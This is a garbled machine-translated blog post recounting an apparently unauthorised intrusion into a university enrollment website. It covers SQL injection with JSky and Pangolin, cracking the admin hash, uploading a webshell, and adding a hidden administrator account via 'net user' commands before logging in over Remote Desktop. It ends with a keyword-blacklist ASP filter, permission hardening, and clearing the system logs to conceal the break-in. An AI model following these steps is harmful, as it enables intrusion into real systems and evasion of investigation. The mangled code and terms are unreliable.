Small server intrusion and vulnerability repair

SQL injection attacks
Today, I checked the enrollment website of a university. To intrude into a website, we first think of using SQL injection to detect the target website. First, enter site: xxx.xxxx.net.cn/zs/index.asp#all pages of the website in Baidu. In the "ah d" directory, let's take a look.
What is the discovery of rice.
Let's leave it to JSky. Let it crawl the network layer structure of the website first to see which page structures are in the website. Then, the website is detected through the detection injection point function provided by JSky.

The connection after SQL injection is a problematic connection, that is, our injection point. We use pangolin to analyze this injection point. Obtain the account and password of the website administrator.

The password has been encrypted by md5. We can go to http://www.20.5.com/default.aspxto crack the keystore. Obtain the administrator password. Obtain a webshell through upload.

The above is a webshell.
Upload a permission escalation tool and execute the cmd command.
Net user help $123456/add
Net localgroup administrators help $/add
Add an administrator account for yourself.

Use Remote Desktop to connect to the server, enter the account and password you just entered, and log on to the server.

Patch
After logging on to the server, first find the website that just obtained the website administrator account and password by injecting the anti-injection system to the website, that is, add such code to the database connection file. (After Anti-injection, it is basically possible for a cainiao like ours to go home manually ~~ )
<%
Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr
'''': Specifies the string to be filtered, which is separated by "anti-DDoS ".
Fy_In = "''' defense; anti-and anti-exec anti-insert anti-select anti-delete anti-update anti-count anti-* anti-chr anti-mid anti-master anti-truncate anti-char anti-declare anti <anti> Anti-= anti |- defense _"
Fy_Inf = split (Fy_In, "anti-DDoS ")
If Request. Form <> "" Then
For Each Fy_Post In Request. Form
For Fy_Xh = 0 To Ubound (Fy_Inf)
If Instr (LCase (Request. Form (Fy_Post), Fy_Inf (Fy_Xh) <> 0 Then
Response. write "<Script Language = JavaScript> alert ('''' ↓, '↓ ,''''); </Script>"
Response. Write "is incredible! You seem to have gone wrong ?! <Br>"

Response. End
End If
Next
Next
End If
If Request. QueryString <> "Then
For Each Fy_Get In Request. QueryString
For Fy_Xh = 0 To Ubound (Fy_Inf)
If Instr (LCase (Request. QueryString (Fy_Get), Fy_Inf (Fy_Xh) <> 0 Then
Response. write "<Script Language = JavaScript> alert, this site is not easy to do '''); </Script>"
Response. Write "is incredible! You seem to have gone wrong ?! <Br>"

Response. End
End If
Next
Next
End If
%>
Add the above Code to the database connection file of the website to filter illegal website parameters.
When I test the injection on this website again, the following phenomena will occur. This effectively avoids the harm caused by injection to the website.

Delete the Inetpub directory

Because the Inetpub folder is a writable and readable directory for network accounts. In this way, hackers can avoid using this folder.
Of course, we can also use the Internet Malay tool to check which directories can be used for reading and writing. Then, modify the permission.

SYSTEM disks and all disks are only granted full control permissions to the Administrators group and SYSTEM.
The SYSTEM disk Documents and Settings directory only gives full control permissions to the Administrators group and SYSTEM.
The SYSTEM disk Administrators and SettingsAll Users directory only gives full control permissions to the Administrators group and SYSTEM.
The SYSTEM disk Inetpub directory and all the following directories and files only give full control permissions to the Administrators group and SYSTEM.
The SYSTEM disk windowssystem32cacls.exe00000000.exe0000net.exe0000net1.exe file only grants full control permissions to the Administrators group and SYSTEM.
The read, modify, and execution permissions of SYSTEM Disk Files are only assigned to the Administrators group and SYSTEM group.

 

Disable the FileSyetemObject component
Enter regsver32 scrrun. dll/u in the C: WINDOWSsystem32 directory under cmd.

Close xp_mongoshell in SQL: Open Enterprise Manager → database → master → extend Stored Procedure → xp_mongoshell and right-click to delete!

However, after the SQL xp_cmdshell is deleted, it can be restored using a tool. But I don't know if there is any way to solve this problem.
This is because the server has been intruded before, and the Administrator account of the server has been cloned. Delete the cloned administrator account.

Download 360 to fix system vulnerabilities on the server.

Clear the system logs on the server (captured by the Administrator's uncle, it is estimated that he will be arrested again for the Network to work hard ~~~)
Transient person ~~